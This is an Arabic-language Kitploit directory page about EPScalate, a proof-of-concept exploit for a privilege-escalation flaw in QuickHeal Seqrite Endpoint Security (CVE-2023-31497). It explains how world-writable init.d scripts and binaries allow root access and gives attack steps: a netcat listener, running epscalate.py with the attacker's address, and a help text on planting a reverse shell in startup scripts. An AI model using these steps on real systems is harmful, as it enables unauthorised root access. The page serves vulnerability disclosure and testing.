Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EPScalate — استغلال لثغرة رفع الامتيازات في QuickHeal's Seqrite EPS (CVE-2023-31497). | Kitploit
أدوات/GitHubGitHub/0xinfection/epscalate
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراق
GitHub0xinfection/epscalate

EPScalate

استغلال لثغرة رفع الامتيازات في QuickHeal's Seqrite EPS (CVE-2023-31497).

عرض المستودع
192منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EPScalate

ثغرة رفع امتيازات في حل Seqrite Enterprise Endpoint Security (EPS) من QuickHeal. تم تعيين معرف CVE-2023-31497 لهذه الثغرة.

https://user-images.githubusercontent.com/39941993/230790056-87157751-b96c-49a6-81df-bf3126acfbd6.mp4

تفاصيل البائع والمنتج

  • البائع: Quick Heal Technologies Limited
  • المنتج: Seqrite Endpoint Security (EPS)
  • الصفحة الرئيسية للمنتج: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
  • الإصدارات المتأثرة: تؤثر على جميع الإصدارات السابقة للإصدار v8.0.

تفاصيل الثغرة

مع تثبيته الافتراضي، يتم تثبيت أمان نقطة النهاية من Seqrite في /usr/lib/Seqrite/ بأذونات دليل وملف ضعيفة جدًا تمنح المستخدم المحلي صلاحية القراءة/الكتابة الكاملة لمحتويات الدليل. بالإضافة إلى ذلك، تقوم عملية التثبيت بتثبيت نصوص بدء التشغيل في /etc/init.d/ وهي قابلة للكتابة من قبل الجميع. وهذا يمكن أي مستخدم منخفض الامتياز على النظام من رفع امتيازاته إلى الجذر.

يستخدم الاستغلال ثغرتين مختلفتين قدمهما البرنامج لرفع الامتيازات على النظام. أولاً، حقيقة أن التطبيق يستخدم نصوصًا في /etc/init.d/ لبدء عمليات المسح الخاصة به، والتي يمكن لأي مستخدم الكتابة فيها. ثانيًا، يستخدم التطبيق الكائنات المشتركة لتحميل الشفرة المستقلة عن الموضع (PIC) ديناميكيًا أثناء وقت التشغيل. في الواقع، جميع ملفات الكائنات المشتركة القابلة للتنفيذ قابلة للكتابة من قبل الجميع. أخيرًا، الملفات الثنائية للتطبيق المستخدمة في عملية الخفي قابلة للكتابة من قبل الجميع، مما يعني أساسًا أن أي مستخدم غير مميز يمكنه استبدال الملفات الثنائية للماسح بملف ثنائي لصدفة عكسية لتنفيذ كود عشوائي كـ root.

استخدام الاستغلال

الاستغلال هو ملف Python بسيط يساعد في استغلال الثغرة.

الخطوات:

  1. على جهاز المهاجم، ابدأ مستمعًا باستخدام netcat (nc -lvp <port>) أو metasploit (multi/handler).
  2. انسخ/نزّل ملفي epscalate.py و shellcode.c إلى النظام المستهدف.
  3. شغّل ملف Python بالوسائط الصحيحة (python3 epscalate.py -H 192.168.0.103:9999 -I).
  4. انتظر حتى يعيد برنامج مكافحة الفيروسات التحميل / إعادة تشغيل النظام.
  5. الاتصال العكسي بمستمعك يمكن أن يؤكد تنفيذ الكود كجذر.

مساعدة الاستغلال:

root@kitploit:~
$ python epscalate.py -h

    EPSCALATE - PoC for privesc in Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique_flag>

options:
  -h, --help            show this help message and exit
  -H HOSTPORT, --hostport HOSTPORT
                        The IP and port of the listening attacker machine in format of <ip>:<port>
  -B, --daemon-binaries
                        Overwrite the main daemon binaries to escalate privileges.
  -I, --initd-scripts   Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.

الدعم

تم اختبار الاستغلال على جميع أنظمة التشغيل المستندة إلى Debian و Ubuntu.

الترخيص والإسناد

تم نشر كود الاستغلال بموجب رخصة Apache 2.0. تم الإبلاغ عن الثغرة للبائع وتم إصلاحها وقت نشر الثغرة.

إسناد الثغرة والاستغلال: Pinaki Mondal (0xInfection).

تنزيل الأداة